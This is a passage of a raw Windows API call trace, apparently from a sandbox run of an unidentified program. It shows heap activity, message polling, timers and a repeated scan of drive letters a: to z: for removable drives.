returned 1 [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.984] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.984] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.984] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0213.984] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.984] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.985] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.985] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.985] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.985] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.985] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.986] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.986] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.986] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.986] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.986] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.987] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.987] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.987] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.987] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.987] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.988] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.988] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.988] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.988] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.989] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.989] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.989] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.990] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.990] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.990] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.990] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.991] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0213.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0213.992] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0213.992] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0213.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.992] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.992] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0213.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.992] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.992] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.992] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.992] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.993] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.993] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.993] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.993] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.993] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.994] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.994] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.994] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.994] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.994] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.995] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.995] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.995] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.995] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.995] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.996] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.996] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.996] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.996] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.996] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.996] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.997] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.997] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.997] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.998] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.998] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0213.999] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0213.999] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0213.999] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0213.999] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0213.999] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.000] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0214.000] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.000] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.000] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0214.000] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.000] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0214.000] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0214.000] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.000] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.001] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.001] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.001] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.001] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.001] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.001] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.002] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.002] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.002] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.002] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.002] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.002] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.002] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.003] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.003] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.003] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.003] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.003] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.003] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.004] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.004] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.004] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.004] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.004] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.004] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.004] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.005] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.005] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.005] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.005] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.005] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.006] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0214.006] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.006] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0214.006] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.007] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.007] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.007] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.007] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.007] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.007] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0214.008] 